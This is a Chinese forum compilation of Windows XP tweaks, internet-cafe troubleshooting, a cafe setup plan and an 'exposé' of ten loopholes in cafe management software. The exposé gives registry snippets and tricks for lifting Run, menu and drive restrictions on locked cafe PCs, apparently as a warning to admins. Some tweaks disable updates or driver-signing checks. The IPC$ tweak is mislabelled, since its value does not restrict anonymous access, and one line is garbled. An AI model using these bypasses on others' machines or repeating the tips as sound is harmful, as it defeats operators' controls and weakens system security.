ManagementPrefetchParameters，其中有一个键值名为EnablePrefetcher，多数情况下它的值是3。推荐设置值是5，在我的机子上，设为5的时候工作状态最佳。可以随便试试不同的数值，直到找到最适合自己机子的值为止。
    大家就把这个东西设置成1 经过测试，1是最快，且不会出问题！

★压缩文件夹
    这是一个相当好的优化，Windows XP内置了对.ZIP文件的支持，我们可以把zip文件当成文件夹浏览。不过，系统要使用部分资源来实现这一功能，因此禁用这一功能可以提升系统性能。实现方法非常简单，只需取消zipfldr.dll的注册就可以了，点击开始——运行，敲入： regsvr32 -u zipfldr.dll 。然后回车即可。
★不加载DLL文件
    浏览器在使用之后往往会有部分DLL文件在内存中缓存好长一段时间，相当大一部分内存会被不用的DLL文件点用。为了防止这种事情发生，找到注册表如下位置：
    HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorer
    接下来建立一个名为AlwaysUnloadDLL，值为1的双字节值。
如果想要去除这项优化，只需把该键值设为0（也可以干脆把键删掉）。注意：该项优化要在Windows重新启动后才生效。
★关闭错误回报
控制台---->系统---->进阶---->右下角--->错误报告---->关闭
★加快窗口显示速度：我们可以通过修改注册表来改变窗口从任务栏弹出，以及最小化回归任务栏的动作，步骤如下：打开注册表编辑器，找到HKEY_CURRENT_USER\
Control Panel\Desktop\WindowMetrics子键分支，在右边的窗口中找到MinAniMate键值，其类型为REG_SZ，默认情况下此健值的值为1，表示打开窗口显示的动画，把它改为0，则禁止动画的显示，接下来从开始菜单中选择“注销”命令，激活刚才所作的修改即可。
★去掉“更新”选项：对于大多数的用户来说，Windows XP的Windows Update功能似乎作用不大，我们可以去掉它，操作步骤如下：打开注册表编辑器，找到
HKEY_CURRENT_USER\Software \Microsoft\Windows\CurrentVersion\Policies\
Explorer子键分支，选择“编辑”菜单下的“新建”命令，新建一个类型为REG_DWORD的值，名称为NoCommonGroups，双击新建的NoCommonGroups子键，在“编辑字符串”文本框中输入键值“1”，然后单击“确定”按钮并重新启动系统即可。

★修改Windows XP的登录背景图案：面对长久不变的单调的登录图案，你可能日久生厌，我们可以通过注册表来把它换成自己喜欢的图案，步骤如下：打开注册表编辑器，找到HKEY_USERS\.DEFAULT\Control Panel\Desktop子键分支，双击wallpaper，键入你选择好的图片的路径，如：c:\Documents and Settings\My Documents\My Pictures\mypic.bmp，点击“确定”，然后找到Tilewallpaper，双击它输入键值“1”，重新启动系统即可看到效果。

★设置启动信息或增加警告信息：如果在启动Windows XP时，希望显示一些自己定义的个性化信息，可以按以下步骤来操作：打开注册表编辑器，找到HKEY_LOCAL_MACHINE_SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon子键分支，双击在它下面的LegalNoticeCaption健值名称，打开“编辑字符串”窗口，在“数值数据”文本框中输入信息对话框的标题，比如“你好，欢迎使用本机器”，然后双击LegalNoticeText，在随后出现的“编辑字符串”窗口中输入想要显示的警告信息，比如“请不要随意修改本级的设置，谢谢！”，单击“确定”按钮，重新启动即可看到修改后的效果了。
  这个最好不要用！
★每次启动时保持桌面设置不变：我们可以通过修改注册表来保护我们的桌面设置，无论做了什么样的修改，只要重新启动之后桌面就会恢复原样。步骤如下：打开注册表编辑器，找到HKEY_CURRENT_USERS\Software\Microsoft\Windows\CurrentVersion\ Polices
\Explorer子键分支，在它的下面找到NoSaveSettings，其类型为REG_SZ，将其键值改为“0”，或者直接删除该键值项，重新启动系统使设置生效。
★清除共享文件夹
  修改注册表为以下两个样式：
去除共享
——————————————————————
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]
"AutoShareServer"=dword:00000000
"AutoSharewks"=dword:00000000
——————————————————————
去除IPC\$管理
——————————————————————
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"restrictanonymous"=dword:00000000
——————————————————————
或者将上面两个保存成个.REG文件，然后双击导入就可以了。
顺便把不要脸的的3721也屏蔽，在hosts文件中加入：
127.0.0.1 cnsmin.3721.com
127.0.0.1 http://www.3721.net/

★加快开始菜单的显示
    Windows XP系统默认的开始菜单显示较慢，但用户可以通过编辑注册键值来加快显示，具体方法是：打开注册表编辑器，寻找"HKEY_CURRENT_USER \ Control Panel \ Desktop \ MenuShowDelay"主键，系统默认值为400，用户可以根据自己的喜好适当调小该键值，最低可设为“0”。如果此方法无效，请从“控制面板”中选择“显示属性”，在“显示效果”中选择“高级”，将"show menu shadow"项的选择取消，这样便可以加快开始菜单的显示了。
★让欢迎窗口更清晰
    Windows XP系统的显示效果得到了较大提高，这主要是基于它使用了名为"ClearType"的清晰化技术，该技术特别让使用笔记本电脑及液晶显示器的用户在运行Windows XP操作系统时感受到与以往系统不同的效果。但由于该清晰效果只有当Windows启动完毕后才能调用，因此在系统启动过程中的欢迎窗口仍然无法实现这一效果。为了使欢迎窗口更加清晰，用户可以使用注册表编辑器进行修改，寻找到这两个主键
"(default user) HKEY_USERS \ .Default \ Control Panel \ Desktop \ FontSmoothing
(String Value)"和"HKEY_USERS \ .Default \ Control Panel \ Desktop \ FontSmoothingType
(Hexadecimal DWORD Value)"，将键值修改为“2”，这样便可以实现清晰显示效果了。
★启动时禁止自动调用"Windows Messenger"
    为了推广微软公司推出的即时聊天程序"Windows Messenger"，Windows XP操作系统的默认设置是在系统启动时便调用该程序。但如果你并不习惯使用该程序，可以通过删除"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\MSMSGS"此键来实现。
二、硬件优化
1、内存性能优化
  设置虚拟内存为 512-1024 不改变目录！
2、打开DMA：到装置管理员里选择IDE ATA/ATAPI controllers ，到Primary/Secondary IDE Channel里面的进阶设定 ，将所有的转送模式都设定为使用DMA(如果可用的话) ，系统就会自动打开DMA支援(在BIOS里也应该要先设为支援DMA)
3、XP里关闭光驱自启动（Autorun）功能：打开：我的电脑，在“移动存储设备”下，右键单击CD-ROM 驱动器，然后单击“属性”，看到“自动播放”选项卡了么？自己去改吧。
    4、设置CPU：Windows XP无法自动检测处理器的二级缓存容量，需要我们自己在注册表中手动设置，首先打开注册表(运行中输入“Regedit”)，打开：
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\，选择“SecondLevelDataCache”，根据自己所用的处理器设置即可，例如PIII Coppermine/P4 Willamette是“256”，Athlon XP是“384”，P4 Northwood是“512”
5、XP安装驱动程式时，往往会出现一个窗口，说这个程序没有经过微软的验证，我们可以在控制面板——系统——硬件——设备管理员——驱动程序签名，看到了选项了么，喀嚓掉！
三、网络优化：
1、加速共享：这是一项很棒的优化，在找到这项优化之前，我经常在漫长地等待窗口显示其它机子上的共享目录中敲破头皮。通常情况下，当Windows XP连接到其它计算机时，会检查对方机子上所有预定的任务——这真是多余，而且还会让你等上30秒钟，实在太糟糕了。所幸的是，很容易就可以把这个过程给禁掉。首先，在注册表中找到HKEY_LOCAL_MACHINE\Software\Microsoft\Windows/Current Version\Explorer\RemoteComputer\NameSpace。在这里面，应该有个
{D6277990-4C6A-11CF-87-00AA0060F5BF}键。只需把它删掉，重新启动计算机后，Windows就不再检查预定任务了，速度明显提高！
2、解决WinXP执行时候停顿一下的问题
开始——网络连接——本地连接，按右键，选择属性，选择“Internet协议（TCP/IP）”，点击属性，使用下面的IP地址：192.168.0.1，子网掩码：255.255.255.0，这样就好了，以後开机就不会停顿了

4、在默认情况下，XP Pro 会保留一块网卡的20%的带宽。 修改的方法是，以管理员权限登陆 ，开始菜单——运行——键入 gpedit.msc ，出现“组策略”窗口， 展开 "管理模板”中的“网络” ， 展开 "QoS 数据包调度程序"， 在右边窗右键单击“限制可保留带宽" ，在属性中的“设置”中有“限制可保留带宽" ，选择“已启用”，然后在下方"带宽限制"栏目里选择一个数值就可以了.不能选择"禁用",因为那样做的话,系统会认为你认可了保留20％的带宽。具体修改可以参照“属性”旁边的“说明”栏目。当进行完上述修改并应用后，用户应该在网络连接的属性对话框内的一般属性标签栏中能够看到"QoS Packet Scheduler（QoS 数据包调度程序）"。Home版不支持该操作，无法去除该限制！
5、xp内置了防火墙，默认设置是未打开。设置方法详见后面的“全面设置防火墙”。
四、XP系统所在分区减肥方法。
1. 删除系统文件备份 sfc.exe -purgecache （一般用户是不怎么用的）
2 删除驱动备份 windows\driver cache\i386目录下的Driver.cab文件 （73mb)
3. 取消系统还原 （总体来说系统还原功能还是不错的，建议除了xp安装的那个盘使用，其它盘都别用，如果哪一天硬盘的空间不够了，可以通过系统清理程序删除一些比较早的还原点）
4、删除帮助文件（减掉40多mb) （使用中文汉化包的文件大小为92兆，刚开始使用xp的同志最好别删）
5、删掉\WINDOWS\system32\dllcache下文件（减去200——300mb)。（这是备用的dll文件，只要你拷贝了安装文件，完全可以这样做。既然这样删你没话说）
7、把虚拟内存也转到其他盘。（就是将这些东西和平时临时下载文件放在一个不大的分区里，这样也方便整理硬盘）
8、将应用软件装在其他盘（这对重装系统也有好处，可以省很多事）。
9、删除\windows\ime下不用的输入法！ （日文，韩文，繁体中文输入法，84.5MB） （到底哪个是哪个自己研究一下吧！有时候也要自己动动脑子的，锻炼一下吧！）
10、如用ntfs装xp,本身就节省地盘。
五、其他
★解决任务栏假死（权威的消除QQ、IE等引起任务栏假死）
    “控制面板"->"区域和语言选项"->"语言"->"详细信息"，在弹出的"设置窗口"中选择"首选项"的"语言栏"，关闭“在桌面上显示语言栏”，在第三项"在通知区域显示其他语言栏图标"复选框上打上勾。如果不需要手写识别、语音识别的话，也可以再勾选最后一项"关闭高级文字服务"。
★某些软件的兼容性（适用于家用版"HomeEdition"及专业版"Professional"）
    对于QQ假死，以及其它某些程序在XP下不能正常运行的现象，可以找到该程序的执行文件，点右键，在弹出的对话框中选择"兼容性"标签，在"兼容模式"下选择相应需要的运行环境。
--------------------------------------------------------------------------------

《我是网管》论坛，打造中国网管第一品牌！


网吧常见问题的诊断与解决

《一键清理系统垃圾》

网吧常见问题的诊断与解决

  网吧是公众上网游戏的地方，时间长了，难免会出现各种各样的故障。作为网管，能迅速
判断故障所在并不费周折的去解决掉是必须的。网吧是以盈利为目的的，所以一旦出现什么
问题，解决问题的经验很重要，所以平时要养成总结管理经验的习惯。比如说哪台机子经常
出什么问题，一般是由什么引起的，如果有一组机子同时上不了网，可能是哪台交换机的问
题等等，时间长了这些都要做到心中有数。所以我建议，每个网管都应该有一个记录管理维
护日志的本子，把每台机子曾经出现的问题，是怎么解决的。每天都有哪些机子更新过哪些
游戏，更换过哪些硬件等等都记录下来做为存档。以后要是再出类似问题，一翻日志就知道
大概是什么地方除了故障。再一个就是如果你不做网管了，有人接你班，你把你的管理日志
交给他，可以让新的管理员迅速的掌握网吧机器和网络的基本情况。

  网吧的常见问题分为三大部分：软件，硬件，网络。我分别把一些易出现的，经典的问题
和大家说一说，希望对网吧的技术人员有一定的帮助。

  软件问题一般可以分为操作系统本身的故障和游戏问题。前者表现为不能启动机器，运行
速度慢，不能自动关机等现象；后者表现为游戏不能进入，不能连机，或者没有声音等等。
操作系统的问题原因比较多，比如驱动不匹配，病毒感染，系统文件损坏等等，由于篇幅有
限和水平有限，不可能都一一解释清楚，所以我把常见的解决系统问题的方法说给大家。
  1.scanreg /restore
  这个命令是恢复注册表的命令，开机按F8，选择进入纯DOS模式输入scanreg /restore，
屏幕上会列出系统最近备份过的5个注册表文件，你可以把最近的那个能正常启动机器的注
册表文件选定，回车重起后注册表就回复了。如果开机发现显卡驱动丢失，或者一启动就打
开若干网页等等，一般是由于注册表读取错误或者非法修改注册表造成的，可以先用这个命
令恢复一下注册表试试。
  2.SFC
  这个命令是启动系统文件检查器的命令。在开始菜单的运行里键入sfc即可启动该程序。
一般选择“扫描改动过的文件”，它就会把系统损坏的文件找出来并提示让你回复。你只需
指定一下win98安装目录，它就会自动提取正确的系统文件来覆盖损坏的文件。这是个会经
常使用的命令，如果你杀完病毒发现不能正常关机了，很可能是病毒感染了系统文件倍竟
讨兴鸹盗讼低澄募贾鹿鼗龃怼Ｈ绻谠诵心吵绦虺鱿终也坏侥衬澄募惹榭龆伎梢杂
   3.msconfig

这个是系统配置实用程序，里面有个启动标签，一般木马或者病毒都会在注册表里写一些
键值，并出现在那个启动标签里，所以如果出现系统开机加载慢或者运行程序慢的话可以先
打开任务管理器查看有什么进程，再运行MSCONFIG看一下开机都自运行了那些程序，这样就
很容易判断问题的所在了。
  4.dxdiag
  directx诊断工具，功能比较多，如果系统有问题的话在启动该程序的时候就会给你有所
提示，你按提示来解决问题就可以了，一般声卡驱动或者显卡驱动出的问题比较多，所以在
装驱动的时候一定要装主板驱动，并且声显卡驱动要用比较稳定的版本。
  5.最后就是覆盖系统或者GHOST了。如果系统经常死机(已排除是风扇等硬件问题)，蓝
屏，启动慢等，可以先用最新的杀毒工具查杀一遍病毒，然后覆盖一下系统，因为覆盖系统
不仅可以从新检测配置一下硬件，从新提取系统文件，而且覆盖完win98的话，以前装的软
件和游戏等都还能正常运行 ，如果是重装系统的话就比较费时间了。还有就是GHOST恢复镜
象，我们在做母盘的时候已经把C盘的镜象备份下来了，无论什么时候只要系统能进DOS就可
以把镜象恢复过来，让系统重生。因为C盘做了镜象之后肯定又添加了一些软件或者更新了
某些程序等等，所以恢复完系统后还要把这些软件和更新补丁打一下。
  关于系统问题的解决就说这么多， 其实都是WIN98自带的一些小工具，能灵活应用这些小
工具可以解决大部分的系统问题。我说的这些问题都是在系统使用一段时间后可能会经常出
现的问题，在装系统的时候就出现的问题解决方法暂时不做讨论。其实在第一次装系统的时
候优化并备份好，以后在使用中只要保护得当，系统不会经常出问题的。我这里网吧的系统
都4个的月了，根本没有重装过系统。
然后接下来说游戏的问题：网吧里没有游戏只上网肯定是不行的，所以每个网吧里都装有
很多的游戏，这也是网管花心思最多的地方，平时更新，升级，打补丁等等大多都是针对游
戏的，系统问题对于有经验的网管来说也许很容易就能判断并解决，但是各式各样的游戏问
题常令网管们头疼，在解决游戏的问题上应该着重考虑这几个问题
1.查看官方网站最近有没有最新的更新包。比如说大话西游，魔力宝贝等不定时的会出一
些升级包，一般情况下，网络游戏都有自动升级功能，但是隔段时间都会有个大的升级包需
要手工下载下来更新，所以要经常的关注各网络游戏官方网站，看有没有最新的更新包需要
升级。
2.如果网络游戏不能正常运行，也有可能是服务端停机维护。一般的网络游戏都有好多个
区，每个区每周都有服务器定期维护的时间，这段时间这个区的玩家是不能玩游戏的。大多
游戏的启动界面都会显示各区服务器的运行状况示意图，如果服务器检修，就要等一下了。
3.游戏里的具体设置。比如说打CS，老有人喊画质不清晰，鼠标不能控制，其实在游戏里
都有具体的设置项的。
4.DIRCIT版本。
好多游戏都需要高版本的DIRCIT支持，装完98后的默认DIRCIT版本是6，我们建议装8.1b。
以前我这里有几台机子的泡泡堂和百战天虫都玩不了，重装了好几遍也不行，后来才发现是
没有装高版本的DIRCIT驱动所致。网吧的游戏一般装了8.1b版本就可以了，但是有个别游戏
要装9才可以运行，如果那样的话就装9吧。如果没有装那些游戏强烈建议装8.1b,因为新的
不一定是最稳定的。
5.有没有合适辅助程序。有些游戏需要合适的辅助程序才能更好的玩，比如玩RPG游戏用的
修改器，网络游戏用的外挂等等，这些东西也需要更新的，所以要经常去下载最新的版本，
否则会不起任何作用。
6.安装路径问题。有些游戏只能按自己默认的路径安装，有些游戏在安装路径中不能有中
文名，如果不符合条件就不能正常运行，所以在安装的时候要看清楚游戏的安装许可协议和
注意事项。其实一般安装时提示不能修改默认安装路径，你把默认的C盘该成D盘也没事。
7.游戏本身限制：也许你碰到过这种情况，红色警戒不能联机玩，半条命用POD建立了主机
加不上机器人等等，其实红警有些图根本就不能联机，CS有些小图根本就没有路点文件。
其实造成游戏不能正常运行的原因还有好多，比如说文件不全，还有显卡设置不对等这就
需要在长期的工作实践中去探索积累了。如果有游戏不能玩也可以去一些游戏论坛去请教别
人，因为游戏论坛里一般都有好多游戏高手，众人拾柴火焰高嘛。

  硬件故障：网吧里的硬件故障也是很常见的，大到主板烧毁，小到鼠标键盘损坏都会遇到
的。首先从大的方面来说说吧。
  网吧最常见的主机故障莫过于接触引起的故障。我们知道AWOER BIOS的主板报警声定义：
一长声为内存问题， 一长两短为显卡问题。当我们听到报警声的话，把内存或者显卡摘下
来，用干净的橡皮把金手指表面的氧化层擦一下再插好就可以了。其实有时候显卡接触不良
并不一定都是报警不能启动。我就遇到过好多次由于显卡接触不好而引起的显示器黑屏现
象，主机能正常启动，显示器也没问题，传输线也没问题，显卡插到别的机子上也能用，最
后清理了一下主板和AGP插槽问题解决了。还有就是主板上尘土比较多的话，也会造成主机
不定时死机的现象。由于网吧里面灰尘比较多，所以最好好隔段时间给机器除一下尘，除尘
的时候要小心仔细一些，别把主板上的元件碰坏了，着重把各插槽和风扇的积土除掉。
  再有就散热问题。有些机子玩一会儿大型的3D游戏就死机，或者开机过几十分钟就死机等
现象，首先要查的就是CPU的风扇转速是否正常，不要太相信BIOS里显示的风扇转速，最好
是拆开机箱用手摸一下散热片的温度。如果确定是风扇的问题要及早更换风扇，以免造成更
大的损失。其实把坏了的CPU风扇背面的油纸撕开，滴进去几滴机油，吹一吹尘土也可以再
继续用一阵子的。在夏天的时候，也许会出现显示器花屏的现象，一般是由于显卡温度太高
造成的显存工作不稳定所造成的，解决方法和CPU风扇的解决方法相同。还有就是网吧的机
器以稳定为主，没有特殊需要千万不要给CPU和显卡超频，更不要超非标准外频。
  由于静电(或者感应电)引起的故障一般现象比较奇怪。有时候根本就点不亮主机，有时候
开机加一下电自动就又断电了。解决这类问题的一般办法就是给主板BIOS放电。放电的时候
要先把主机的电源线拔掉，然后在BIOS电池周围会有一个3针的跳线(个别主板是2组3针的跳
线)，正常的时候跳线靠在一边，你只需把跳线跳到另一边等3-5秒钟就好了。如果你找不到
那组跳线，那么把BIOS电池拔了等10分钟也可以起到BIOS放电的作用。如果主机莫名奇妙的
不能启动，最好是先把BIOS放一下电，再做其它措施。如果放电后还不能启动的话，先把内
存拔掉看主板报不抱警，如果报警的话，说明主板和CPU等都可以正常运行，如果不报警的
话，把CPU风扇摘下来用手摸一下CPU还热不热，如果热就是CPU工作正常(一般来说是，不排
除意外)，那么一般就是主板的问题了。这就是排除法的一个简单应用，其它的硬件维修方
法还有最小系统法，替换法等等，我们可以去多了解一下。
  从小的方面来说，硬件故障又分为主板，显卡，电源，显示器等各配件的问题。对于网管
来所一般不要求对这些配件做到元件级别的维修，但是拆拆鼠标，调节一下显示器的聚焦按
钮，升级一下主板BIOS等等小问题还是有必要学一学的，由于涉及东西太多，所以建议大家
找相关资料看一下。
  最后说一下网络问题的解决。网络故障一般可以划分为逻辑故障和物理故障，前者是所一
些由于设置引起的问题，后者是由于设备出错引起的问题。我们通过一个例子来看一下网络
故障的一般解决步骤。如果某台机器上不去网，可以先在DOS运行ipconfig /all，或者在
windows下运行winipcfg，查看一下本地的TCP/IP协议配置，主要看IP，子网，网关，DNS是
否配置正确。ip要和网关在一个网段，DNS要用ISP提供的地址，网关一般是你的路由的IP或
者上网服务器IP，这些具体配置和你本网吧的网络整体设计有关，要根据情况设置。如果运
行这个程序提示读取IP错误的话，一般是网卡驱动没装好，或者网卡中断冲突等原因。还有
一种情况是显示139开头的IP地址，这是你设置了自动获取IP，但是网络内没有DHCP服务，
系统所使用的临时IP，所以你要么就在网络中配置一下DHCP服务，要么就指定一下IP。
  如果IPCONFIG显示网络配置正常的话，可以ping一下自己的IP，注意不是127.0.0.1，是
IPCONFIG里显示的那个IP，如果能ping通的话，说明本地TCP/IP协议可以正常运行。如果连
自己也ping不通的话，那一般是配置错误或者局网中存在IP冲突造成的。
  如果ping自己正常，那ping一下网关，如果是time out的话，一般是物理连接方面的问
题，比如说网卡和网线接触不良，或者交换机端口损坏等等。这就要用分段法来排除了。关
于ping命令的用法还有好多，一般都是跨路由等复杂网络中返回的错误情况比较多一些，网
吧一般不会出现的。
  如果ping网关正常，说明整个局网环境是通路，没有问题的，下面就要ping一下dns的地
址了。由于DNS在本局域网之外，中间通过了路由或者代理服务器等，所以如果ping不通的
话，就要检查路由器或者服务器的设置了。路由器如果配置好了的话，如果没人去改它的设
置一般是不会出问题的，但一些质量比较差的路由器在散热方面和供电电路上做的不好，在
使用一段时间后转发数据的速度会变的很慢，这时候把路由关掉，让它自然降温一下就好多
了。现在的新出路由配置都带有中文的向导，可以实现傻瓜式操作，所以只要你有一点网络
知识，看一下说明书就可以很顺利的配置了，我在这里就不多说了。关于代理服务器出现的
问题最多的就是由于代理服务器本身装着防火墙的缘故，好多人说代理服务器都配置好了，
下面的机子还是不能上网，结果是系统自带的防火墙没有关闭。还有个误区就是，如果ping
不通dns也不一定就是路由或者代理服务器的问题，也有可能是DNS服务器或者其它的节点出
了问题，这就比较复杂了 ，要用tracert等命令诊断了，一般就算你判断出是哪个IP段除了
问题，做为网吧网管也没有权限去配置那里的设备了，所以我们这里不做讨论。
  ping通了dns，如果还不能上网，那就ping一下网址，看能不能通，如果不通那就是DNS服
务器的原因了，打电话问你的ISP提供商吧。至此，一个很典型的网络问题就 已经解决了。
这个步骤一般是通用的，出了问题就要一步步的判断，排除，直到最后找出问题，解决掉。
由于网吧的网络结构一般比较简单，所以还有几个跨路由的命令的应用没给大家介绍，主要
是用的很少，大家可以找相关资料多了解一下，毕竟我们不会永远就管理这么几台机子的。
关于网络的物理故障，我们可以分为网卡，交换机，路由器，网线的故障。网吧常用的网
卡都是10/100M自适应的网卡，插上就能用，上面有的有2个灯，有的有1个灯，2个灯的一个
是电源灯，一个是信号灯，当信号灯是红色的时候表示网络不通，绿色的时候表示通路，闪
烁的时候表示有数据通过，1个灯的只是把电源灯省掉了。如果发现网卡工作不正常，可以
换个槽看看，也可以在BIOS里修改一下中断等方法来解决，一般显卡和网卡不要靠的太近，
会造成一写信号干扰，影响网卡的性能。

还有一种情况就是网线做的不规范造成的问题。强烈建议网线用T568A或者T568B的标准做
法。前者的线序是橙白，橙，绿白，蓝，蓝白，绿，棕白，棕，后者是在前者的基础上1-
3，2-6对掉。交换机的非UPLINK口到网卡，到另一个交换机的UPLINK口，还有路由的LAN口
到交换机的UPLINK口等都用A类做法，网卡到网卡，交换机的非UPLINK口到另一台的非
UPLINK口等应该用B类做法，总之要保证网线一段是MDI +，另一段是MDI -。也有的交换机
和路由是MDI自适应的，所以都做成A类的也可以。还有一个问题就是做网线的时候，不要让
水晶头外面的裸线露的太多，否则时间一长容易松动。也有的水晶头时间长了造成和插槽接
触不良，可以找个旧牙刷，刷一下水晶头的接触部分，或者干脆重做一个水晶头。
网吧的交换机一般都是不可管理的不可堆叠的，插上电就能用，没什么好说的。
每个端口都有几个指示灯，一般是10/100M灯，数据交换信号灯，电源灯。哪个端口出问题
找哪条线的问题就可以了,如果某个端口不亮，不一定就是交换机的端口坏了，也可以能是
网线问题，或者终端机器没有开启等等，掌握一定的经验后会很快判断故障的原因所在。
路由一般有WAN指示灯和LAN指示灯，WAN指示灯亮的话，说明猫到路由之间是通路，如果不
亮的话就要检查路由到猫的那小段线了。LAN口灯用来指示路由到主交换机之间的通信状
况，有些高级的路由还有其它协议指示灯等。我们在解决问题的时候要根据指示灯作出正确
的故障判断。
ADSL猫一般不会出什么问题的，上面的指示灯一般有个ADSL灯，上行指示灯和下行指示
灯。ADSL灯亮的时候说明和远端已经建立了连接并同步。上行灯和下行灯闪的时候当然就是
有数据包传输了。我曾见过多次由于电话接口盒到猫的拿小段电话线损坏造成的不能上网的
例子，如果猫不能同步，请先把那段电话线更换一下再说。

网吧常见的问题就先粗略的介绍到这里，对于具体问题还要具体对待。关键还要去积极的
实践总结。在实践中学习才会积累更好更多的经验。

--------------------------------------------------------------------------------

《我是网管》论坛，打造中国网管第一品牌！


网吧方案介绍

《一键清理系统垃圾》

网吧方案介绍

根据目前Internet在全国的发展形势，网吧建设成为大多数人互联网上冲浪的

理想场所。该网吧方案支持如下功能：

.一机在线，集体上网，速度快，物超所值。可以网上聊天，网上购物，网上交

友，在线游戏，收看网上直播节目，收听在线广播，维护个人主页。总之，

Internet上的功能应有尽有。使用本公司的代理服务器，还不会再有人抱怨网络速

度慢的问题。

.可收发Email。Email是目前互连网上应用最广的功能之一，也是目前网上传情

的好工具。

方案配置：

以标准方案10个点为例：

. 硬件配置为： CENTURY服务器, 八一时空电脑,集线器

.软件配置为： WINGATE软件,FOXMAIL电子邮件工具, NETANTS下载软件

,OICQ聊天软件.WINZIP8.0解压软件。

方案网络拓扑图

方案费用表：

.硬件价格

设备名称
数量
价格
说明

CENTURY服务器 PA2000
1
￥时价
PIII550/S/128M/18G/NIC

ADICO
.
￥时价
10/100M/S

八亿时空电脑
.
￥时价
CY466S, 64M,8.4G

DINTEK CAT.5
.
￥时价
布线产品

.软件为本系统配套产品不另收费；

.工程费加收硬件的15%(含具体工程的设计费,安装费用,工程建设费,管理费等) 。

返回


网吧安全之---网吧管理十大漏洞嚗光

《一键清理系统垃圾》

网吧安全之---网吧管理十大漏洞嚗光

    上网吧的人多了，管理也难了，于是网吧管理软件也来了。网管软件来了，于是网管就轻松了，每天打开电脑，启动软件，仿佛也就没事了。不过真是这样吗?也许只是轻点几下鼠标，就会找到几个漏洞，网管软件也就如玻璃般的碎掉。不信?
    现在网吧的管理员大多使用诸如《美萍》之类的网吧管理软件来管理系统，同时还通过修改系统注册表的方法来禁止用户进行诸如删除文件、修改参数的危险操作。但在没有使用任何工具软件的前提下，以一些简单的方法就轻易突破了网吧管理软件的限制，原本被禁止的系统功能全部复活，不仅可以删除文件，还可以对系统注册表进行随意修改，整个系统可任意使唤。这次，我们将在网吧发现的十大致命漏洞全部曝光，以此警示每一位网吧管理员。

    一、IE菜单漏洞
    找回菜单　---轻松
    微软老大的补丁越打越多，这样，倒不是说比尔大叔的漏洞越来越多了，而是正应了那句“上有政策，下有对策”，网管软件在旧版本中的屏蔽IE中的文件和工具菜单的漏洞有一大箩筐，新版本的漏洞就不那么容易发现了，不过，请看……
    探秘欲望度：★★★★★
    探秘难度：★★★☆☆
    探秘方法：这次我们需要再次用到快捷键，这次轮到“Win+D”了，刷新桌面，在《美萍》下的桌面实际是美萍指定的一个目录，而原桌面则被隐藏了，刷新是对原桌面的刷新，只要你不切换其他窗口，我的电脑等将会一直存在于桌面之上。你要做的是：打开我的电脑，然后再点工具栏中的“向上”，就可以把桌面以窗口的形式打开了（因为硬盘是被屏蔽掉的，当我们打开我的电脑时将什么都看不见），此时你要做的是新建一个文本文档，输入这么几行：　REGEDIT4　[HKEY_CURRENT_USER\Software\Microsoft\Windows\Current　Version\Explorer]　″NoFavoritesMenu″=dword00000000　　　另存为任意文件名后缀为“.reg”的文件就可以了，之后你要做的就是导入它，等你再次开机时打开我的电脑就会看见那可爱的被网管软件屏蔽IE中的文件和工具菜单啦。

    二、本地硬盘漏洞
    给硬盘解锁　---小菜
    上网者最苦大仇深的莫过于不能使用硬盘了，不说那些很伤心的故事了，就说你要下载个什么“小小六号”过过侠客瘾，可你下载的文件放哪儿?下面这招解锁方法就这样出笼了。
    探秘欲望度：★★★★★
    探秘难度：★★★☆☆
    探秘方法：见过报上的寻人启事吗?见过，不就是查找吗?丢的人不一定找得到，硬盘却是绝对可以找回来的。网吧老板们大都因为屏蔽了硬盘而对热键大开绿灯。其原因也是再简单不过的了，因为你在搜索栏内找不到本地硬盘，如果你选择我的电脑来进行“查找”快捷键是用“WIN+F”键啦,如“Command”等的文件时一定会被告知“找不到”。但其实不然，在搜索栏中输入“C:\”回车后，找到的可就是一大堆的东西了。　　这样一来，又可以对本地硬盘进行访问了。当然还有一些人通过操作系统与IE高度结合的漏洞：打开IE浏览器后，在地址栏中直接输入“C:”后按“回车”键也可以察看硬盘中的资源，但这是一种是较古老的方法了。

    这里的关键就是如何访问到本地硬盘，一旦进入了本地硬盘，对于一个熟悉Windows系统的用户来说，一台完整的电脑就在面前了。

    三、程序运行漏洞
    禁止运行　---没门
    用惯电脑的人都知道，在开始菜单里面有一个很重要的程序，那就是运行程序了，有了这个程序我们可以运行我们想用到的其它程序，而进一步实现电脑的操作。但是在网吧上网的时候，当然就没有那么好的事情了，网吧老板们总喜欢安装一些网管软件来阻止我们的使用，唉，真没办法，在这种情况下，我们就只能另找门路啦!于是，绕过马奇诺防线的方法出现了。
    探秘欲望度：★★★☆☆
    探秘难度：★★★☆☆
    其实方法真的很简单哦，在我们所提到的其它漏洞方法中已经提到过了的，当然就是修改注册表了，只是其中的参数不同而已，当然改成运行的那个参数不就行了吗?这里我们用导入的方法进行修改。先打开一个记事本，在上面输入：　　REGEDIT4　[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]　″NoRun″=dword00000000　　　然后保存为“.reg”文件或保存为“.txt”文件后将扩展名改为“.reg”，再执行该文件即可。就这么简单搞定，方便快捷。

    四、资源管理器漏洞
    解放管理器---　有戏
    资源管理器，想必每一个电脑的使用者都应该知道吧，它的作用当然就是让我们更方便地操作电脑里的全部内容，但一些网吧老板却不提供这些方便给我们。不过要想在网吧操作自如，也不是太难!
    探秘欲望度：★★★★☆
    探秘难度：★★★☆☆
    探秘方法：网吧的电脑什么都可以没有，当然就不能没有QQ和IE啦，好的，那我们就从IE下手吧。通过IE查看文件夹，这种方法非常直接有效。首先打开一个IE，拉出“查看”下拉菜单，选择“浏览器”中的“文件夹”选项。　　这时，主窗口左侧出现资源管理器的窗口，内有我的电脑树形目录结构。这时用户可以根据自己的需要一层层地展开，寻找自己所需的东东了。

    五、鼠标右键漏洞
    挡住右键菜单　---没戏
    网页上有那么多漂亮的图片或者自己众里寻他千百度的资料，可兴冲冲地点击右键想把它保存下来，却发现右键根本不能用，你的感觉是不是七窍冒烟啦。也许正是这个原因才让人发现了这个漏洞。
    探秘欲望度：★★★☆☆
